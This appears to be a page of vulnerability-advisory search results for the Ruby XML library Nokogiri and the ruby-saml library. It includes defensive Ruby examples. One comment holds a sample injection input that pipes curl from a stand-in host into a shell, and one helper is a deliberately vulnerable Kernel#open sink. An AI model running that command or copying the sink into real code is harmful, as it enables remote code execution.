352 matches found
Unity Linux 20.1060e / 20.1070e Security Update: rubygem-nokogiri (UTSA-2026-016636)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-016636 advisory. Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri v1.12.4 and earlier, on JRuby only, the SAX parse...
Astra Linux - vulnerability in ruby-nokogiri
A command injection vulnerability exists in Nokogiri v1.10.3 and earlier. This vulnerability allows commands to be executed in a subprocess via Ruby's Kernel.open method. Processes become vulnerable only if the undocumented method Nokogiri::CSS::Tokenizer#load_file is called with unsafe user input ...
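The sink behind the advisory above, as an added example that is not Nokogiri's code: Ruby's Kernel#open treats a filename that begins with "|" as a command to spawn, so any helper that passes an attacker-controlled filename to open() becomes a command-injection sink. The hardened form uses File.open, which never interprets the pipe prefix, plus a confinement check. The helper names and the base directory are assumptions made for this example.

```ruby
# Added example (not Nokogiri's code). Helper names are hypothetical.

# Vulnerable pattern: Kernel#open interprets a leading "|" as "spawn this
# command and read its stdout". With path = "|curl evil.example|sh" this
# runs the command. (Newer Rubies warn about this form; use IO.popen when
# a pipe is actually intended.)
def read_with_kernel_open(path)
  open(path) { |io| io.read }
end

# Hardened: File.open never spawns a process. A name such as "|echo x" is
# just a filename that does not exist, so this raises Errno::ENOENT
# instead of executing echo.
def read_with_file_open(path)
  File.open(path, File::RDONLY) { |io| io.read }
end

# Defence in depth: reject a pipe prefix or embedded NUL before touching the
# filesystem, and confine the resolved path to an allowed base directory.
def safe_path?(path, base_dir)
  return false if path.start_with?("|") || path.include?("\0")
  base = File.join(File.expand_path(base_dir), "")
  File.expand_path(path, base_dir).start_with?(base)
end

def read_confined(path, base_dir)
  unless safe_path?(path, base_dir)
    raise ArgumentError, "refusing to open #{path.inspect}"
  end
  read_with_file_open(File.expand_path(path, base_dir))
end
```

The same pattern applies to IO.read, IO.readlines and IO.foreach, which historically honoured the pipe prefix as well; prefer the File class methods whenever the name comes from outside the process.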
Astra Linux - vulnerability in ruby-nokogiri
Nokogiri is an open-source XML and HTML library for Ruby. Nokogiri contains a regular expression that is inefficient and prone to excessive backtracking when attempting to detect encoding in HTML documents. Users are advised to upgrade to Nokogiri >= 1.13.4. There are no known solutions or...
GHSA-V2FC-QM4H-8HQV Nokogiri XSLT transform has a memory leak
Summary Nokogiri's Nokogiri::XSLT::Stylesheet#transform leaks a small heap allocation when passed a Ruby string parameter containing a null byte. For applications that pass attacker-controlled input through XSLT.transform parameters, this may be a vector for a denial of service attack against...
GHSA-C4RQ-3M3G-8WGX Nokogiri CSS selector tokenizer has regular expression backtracking
Summary Nokogiri's CSS selector tokenizer contains regular expressions whose construction may result in exponential regex backtracking on adversarial selectors. Three ReDoS vectors are addressed in this release: 1. String-literal tokenization on certain unterminated quoted-string input. 2...
PT-2026-38489
Summary Nokogiri's Nokogiri::XSLT::Stylesheet#transform leaks a small heap allocation when passed a Ruby string parameter containing a null byte. For applications that pass attacker-controlled input through XSLT.transform parameters, this may be a vector for a denial of service attack against...
Missing Release of Memory after Effective Lifetime
Overview nokogiri is a gem for parsing HTML, XML, SAX, and Reader. Affected versions of this package are vulnerable to Missing Release of Memory after Effective Lifetime in the XSLT::Stylesheet#transform function, when a string parameter containing a null byte is processed, preventing...
Nokogiri does not check the return value from xmlC14NExecute
Summary Nokogiri's CRuby extension fails to check the return value from xmlC14NExecute in the methods Nokogiri::XML::Document#canonicalize and Nokogiri::XML::Node#canonicalize. When canonicalization fails, an empty string is returned instead of raising an exception. This incorrect return value may...
Unchecked Return Value
Overview nokogiri is a gem for parsing HTML, XML, SAX, and Reader. Affected versions of this package are vulnerable to Unchecked Return Value from xmlC14NExecute, used in the canonicalize methods. These return an empty string rather than an error code for invalid and incomplete XML inputs...
GHSA-WX95-C6CV-8532 Nokogiri does not check the return value from xmlC14NExecute
Summary Nokogiri's CRuby extension fails to check the return value from xmlC14NExecute in the methods Nokogiri::XML::Document#canonicalize and Nokogiri::XML::Node#canonicalize. When canonicalization fails, an empty string is returned instead of raising an exception. This incorrect return value may...
UBUNTU-CVE-2025-66567
The ruby-saml library is for implementing the client side of a SAML authorization. ruby-saml versions up to and including 1.12.4 contain an authentication bypass vulnerability due to an incomplete fix for CVE-2025-25292. ReXML and Nokogiri parse XML differently, generating entirely different...
CVE-2025-66568
The ruby-saml library implements the client side of a SAML authorization. Versions up to and including 1.12.4 are vulnerable to authentication bypass through the libxml2 canonicalization process used by Nokogiri for document transformation, which allows an attacker to execute a Signature Wrappi...
PT-2025-49775
Name of the Vulnerable Software and Affected Versions ruby-saml versions through 1.12.4 Description The ruby-saml library, which handles SAML authorization on the client side, has a flaw that could allow an attacker to bypass authentication. This is due to how the library processes XML data using...
GHSA-9V8J-X534-2FX3 Ruby-saml has a SAML authentication bypass due to namespace handling (parser differential)
Summary In Ruby-saml up to and including 1.12.4, there is an authentication bypass vulnerability because of an incomplete fix for CVE-2025-25292. ReXML and Nokogiri parse XML differently, so the parsers can generate entirely different document structures from the same XML input. That allows an attacker...
Ruby-saml allows a Libxml2 Canonicalization error to bypass Digest/Signature validation
Summary In Ruby-saml up to and including 1.12.4, there is an authentication bypass vulnerability because of an issue in the libxml2 canonicalization process used by Nokogiri for document transformation. That allows an attacker to execute a Signature Wrapping attack. The vulnerability does not...
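The failure mode shared by the xmlC14NExecute entries above and the ruby-saml canonicalization bypass is a canonicalize call that reports failure as an empty string, which a digest or signature check then happily consumes. The following is an added example, not Nokogiri's or ruby-saml's code: a fail-closed wrapper that refuses to treat an empty canonical form as content, and a reference digest check built on it. The node type is assumed to be anything responding to #canonicalize (a Nokogiri::XML::Node in real code); the stand-in class, sample XML and digest are constructed for this example.

```ruby
require "digest"

# Added example (not Nokogiri's or ruby-saml's code).
class CanonicalizationError < StandardError; end

# Fail closed: affected Nokogiri versions return "" when xmlC14NExecute
# fails. An empty canonical form is never valid signed content, so raise
# rather than let a caller hash it.
def strict_canonicalize(node)
  c14n = node.canonicalize
  if c14n.nil? || c14n.empty?
    raise CanonicalizationError, "canonicalization produced no output"
  end
  c14n
end

# Reference digest check over the canonical form (SHA-256, base64 reference
# value as in XML-DSig). Canonicalization failure still raises; only a
# genuine digest mismatch returns false.
def digest_matches?(node, expected_b64)
  canonical = strict_canonicalize(node)
  actual = Digest::SHA256.digest(canonical)
  expected = expected_b64.unpack1("m0")   # strict base64 decode
  return false unless actual.bytesize == expected.bytesize
  # Constant-time comparison: OR together every byte difference.
  actual.bytes.zip(expected.bytes).inject(0) { |acc, (a, b)| acc | (a ^ b) }.zero?
end

# Constructed stand-in for the demo only; `canonical` is what #canonicalize
# returns. In real code `node` is a Nokogiri::XML::Node.
FakeNode = Struct.new(:canonical) do
  def canonicalize
    canonical
  end
end

# Constructed sample: an assertion fragment and its correct reference digest.
SAMPLE_XML = "<Assertion ID=\"_1\"><Subject>alice</Subject></Assertion>"
SAMPLE_DIGEST_B64 = [Digest::SHA256.digest(SAMPLE_XML)].pack("m0")
```

Where a verifier compares canonical forms directly (rather than digests), the same rule holds: two empty strings comparing equal is a match between nothing and nothing, and the check must raise instead.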
Malicious code in nokogiri (npm)
Source: ghsa-malware 52d84f0c9be95071bb514b725ec5c700efe36d5b4ebed67b5e36c3f2cbf6d40e. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2025-48034 Malicious code in nokogiri (npm)
Source: ghsa-malware 52d84f0c9be95071bb514b725ec5c700efe36d5b4ebed67b5e36c3f2cbf6d40e. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
EUVD-2019-0629
Malware in sbrugna...
EUVD-2021-1954
Malware in sbrugna...
EUVD-2025-18911
Malicious code in bioql PyPI...